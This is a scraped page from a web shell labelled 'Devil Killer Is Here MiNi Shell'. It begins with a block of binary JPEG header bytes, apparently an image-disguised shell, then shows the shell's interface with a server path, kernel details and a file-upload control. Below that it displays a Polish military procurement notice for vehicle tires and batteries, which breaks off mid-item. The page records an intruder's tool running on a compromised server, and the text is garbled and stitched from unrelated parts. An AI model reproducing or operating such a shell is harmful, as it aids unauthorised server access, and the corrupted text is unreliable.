JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251002/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251002/0045466801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA CZĘŚCI I AKCESORIÓW DO POJAZDÓW W 2025 R. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA CZĘŚCI I AKCESORIÓW DO POJAZDÓW W 2025 R. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b87e2d1-e13a-4c0b-b431-5fadc27d584f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00454668</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00120857/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.14 DOSTAWA CZESCI I AKCESORIÓW DO POJAZDÓW W 2025 R.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> : https://platformazakupowa.pl/transakcja/1185515 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">: https://platformazakupowa.pl/transakcja/1185515</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zasada wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Rozdziale X SWZ. <br/>Komunikacja między Zamawiającym a Wykonawcą odbywa się za pośrednictwem https://platformazakupowa.pl/pn/21wog i formularza &#34;Wyślij wiadomość do zamawiającego&#34;.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Dostawę części i akcesoriów do pojazdów w 2025 r.” nr postępowania 40/SZP/2025;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">40/SZP/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w część zamówienia nr 1 jest dostawa Opon, dętek i ochraniaczy do dętek do magazynów wskazanych w opisie przedmiotu zamówienia. Wyszczególnienie przedmiotu zamówienia:<br/>1. &#34;OPONA LETNIA 235/65R16C<br/>Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności - nie mniej niż 115/113 (1215/1150 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż R (170 km/h). Data produkcji -nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>2. &#34;OPONA ZIMOWA 215/65R16C <br/>Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności - nie mniej niż 109/107 (1030/975 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż R (170 km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>3.&#34;OPONA 12.00R20 Opona radialna drogowa, całoroczna, dętkowa naprzód i tył.<br/>Indeks nośności - nie mniej niż 154/150 (2000/1800 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż K (110 km/h)km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>4.&#34;OPONA 12.00R24 Opona radialna,drogowa, całoroczna,dętkowa-bezdetkowa na przód i tył. <br/>Indeks nośności - nie mniej niż 160/156 (4500 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż K (110 km/h)km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>5. &#34;OPONA CAŁOROCZNA 12.00/R20<br/>Opona całoroczna do samochodów ciężarowych radialna, terenowa, dętkowa.<br/>Indeks nośności - nie mniej niż 154/149 (3750 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż K (110 km/h)km/h). Typ bieżnika HH 301. Data produkcji -nie starsze niż 12 miesięcy w dniu dostawy<br/><br/>6. &#34;OPONA CAŁOROCZNA 9,5R17,5 Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności - nie mniej niż 129/127 (1850/1750 KG)<br/>Indeks dopuszczalnej prędkości- nie mniej niż M (130 KM/H) Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>7.&#34;OPONA LETNIA 215/60R17C<br/>Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności - nie mniej niż109/107 max (1330 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż T (190 km/h).<br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/><br/>&#34;<br/>8.&#34;OPONA LETNIA 225/55R17C<br/>Opona pneumatyczna radialna, drogowa, bezdętkowa,<br/>Indeks nośności - nie mniej niż 101 (825 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż V (240 km/h).<br/>Data produkcji -nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>9.&#34;OPONA ZIMOWA 225/55R17 Opona pneumatyczna radialna, bezdętkowa, drogowa.<br/>Indeks nośności -nie mniej niż 98 (750 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż V (240 km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>10.&#34;OPONA CAŁOROCZNA 195/65R15 <br/>Opona pneumatyczna radialna bezdętkowa.<br/>Indeks nośności - nie mniej niż 91 (max 615 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż T (190 km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>11.&#34;OPONA ZIMOWA 235/65R16C<br/>Opona pneumatyczna radialna, bezdętkowa, drogowa.<br/>Indeks nośności - nie mniej niż 115/113 (1215/1150 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż R (170 km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>12.&#34;OPONA ZIMOWA 215/70R15C <br/>Opona pneumatyczna radialna, bezdętkowa, drogowa.<br/>Indeks nośności - nie mniej niż 109/107 (1030/975 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż R (170 km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>13.&#34;OPONA ZIMOWA 235/65R16C 115/113R <br/>Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności -nie mniej niż 115/113 ( 1215/1150 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż R ( 170 km/h). Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>14.&#34;OPONA LETNIA 195/70R15C <br/>Opona pneumatyczna radialna, bezdętkowa, letnia.<br/>Indeks nośności - nie mniej niż104/102 (900/850 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż R (170 km/h).<br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>15.&#34;OPONA LETNIA 195/70R15 <br/>Opona pneumatyczna radialna, drogowa, bezdętkowa, letnia.<br/>Indeks nośności - nie mniej niż 97 (730 kg).<br/>Indeks dopuszczalnej prędkości - nie mniej niż T (190 km/h).<br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>16.&#34;OPONA L 195/65R15 <br/>Opona pneumatyczna radialna bezdętkowa letnia.<br/>Indeks nośności -nie mniej niż 91 (max 615 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż H (210 km/h).<br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>            &#34;<br/>17.&#34;OPONA CAŁOROCZNA 12.00/R20 <br/>Opona pneumatyczna radialna, drogowa, bezdętkowa, całoroczna Symbol prędkości - nie mniej niż K do 110 km/h.<br/>Indeks nośności - nie mniej niż 154/150K Rozmiar: 12.00 R20 18PR <br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy<br/>&#34;<br/>18. DĘTKA 12.00-R20 24-79-01-344<br/>19. OCHRANIACZ DĘTKI 1200X20<br/>20. &#34;OPONA LETNIA 215/60R17<br/>Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności - nie mniej niż 96 max (710 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż H (210 km/h).<br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>21. &#34;OPONA ZIMOWA 215/60R17<br/>Opona pneumatyczna radialna, drogowa, bezdętkowa.<br/>Indeks nośności - nie mniej niż 96 max (710 kg).<br/>Indeks dopuszczalnej prędkości -nie mniej niż H (210 km/h).<br/>Data produkcji - nie starsze niż 12 miesięcy w dniu dostawy&#34;<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 i 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamówienie będzie realizowane z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Zamawiający informuje, ze opcją jest różnica pomiędzy ilościami maksymalnymi <br/>i minimalnymi.<br/>2.	Zamawiający przewiduje realizację przedmiotu umowy dla ilości minimalnych w całości. Ilości maksymalne, stanowiące górną granicę potrzeb Zamawiającego (będące opcją) są określone w załączniku nr 1 i 2 do umowy.<br/>3.	Zamawiający informuje, ze jeśli ilość minimalna jest równa ilości maksymalnej oznacza to, że dla danej pozycji asortymentowej nie stosuje się prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w części zamówienia nr 1, 2 Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji termin dostaw dla ilości minimalnych - 40%<br/><br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji termin dostaw dla ilości minimalnych”.<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto oferty dla ilości minimalnych <br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej dla ilości minimalnych<br/><br/><br/>W kryterium „Przyjęty do realizacji termin dostaw dla ilości minimalnych” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił od 5 do 7 dni roboczych od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT II - 30 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił od 8 do 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT III - 20 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił od 11 do 13 dni roboczych od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT IV - 10 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił do14 dni roboczych. od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT IV - 0 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił do15 dni roboczych. od dnia złożenia zamówienia przez Zamawiającego<br/><br/>Wykonawca spośród przedstawionych terminów dostaw wybiera jeden wariant dostaw(odpowiednio dla części zamówienia) i stosowną informację zamieszcza <br/>w tabeli w pkt 6 formularza ofertowego (zał. nr 2 do SWZ) <br/><br/>UWAGA:<br/>	Minimalny termin realizacji dostawy nie może być krótszy niż 5 dni roboczych od dnia złożenia zamówienia przez Zamawiającego .<br/>	Maksymalny termin realizacji dostawy nie może przekroczyć 15 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	Brak wypełnienia spowoduje uznanie przez Zamawiającego, że dostawa będzie wykonana w terminie do15 dni roboczych, i w związku z czym Wykonawca otrzyma 0 pkt.<br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji termin dostaw dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w część zamówienia nr 2 jest dostawa akumulatorów do magazynów wskazanych w opisie przedmiotu zamówienia. Wyszczególnienie przedmiotu zamówienia:<br/>1.&#34;AKUMULATOR 12V <br/>-technologia: kwasowo-ołowiowa<br/>- napięcie: 12V<br/>- pojemność: nie mniej niż 35Ah<br/>- prąd rozruchowy: nie mniej niż 300A Wymiary:<br/>- długość 187mm +/- 10mm<br/>- szerokość 127mm +/- 10mm<br/>- wysokość 227mm +/- 10mm Polaryzacja - P+ (prawy plus)<br/>Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia<br/>&#34;<br/>2. &#34;AKUMULATOR 12V<br/>-technologia: kwasowo-ołowiowa<br/>- napięcie:12V - pojemność: nie mniej niż 66Ah<br/>- prąd rozruchowy: nie mniej niż 570A<br/>Wymiary: - długość 242 mm +/- 10mm - szerokść 175 mm +/- 10mm - wysokość 175 mm +/- 10mm Polaryzacja - P+ (prawy plus) Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia&#34;<br/>3. &#34;AKUMULATOR 12V<br/>- technologia : kwasowo-ołowiowa<br/>- napięcie: 12V<br/>- pojemność: nie mniej niż 95Ah<br/>- prąd rozruchowy: nie mniej niż 840A<br/>Wymiary: -długość 352 mm +/- 10mm -szerokość 175 mm +/- 10mm -wysokość 175 mm +/- 10mm Polaryzacja - P+ (prawy plus) Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia&#34;<br/>4. &#34;AKUMULATOR 12V -technologia: 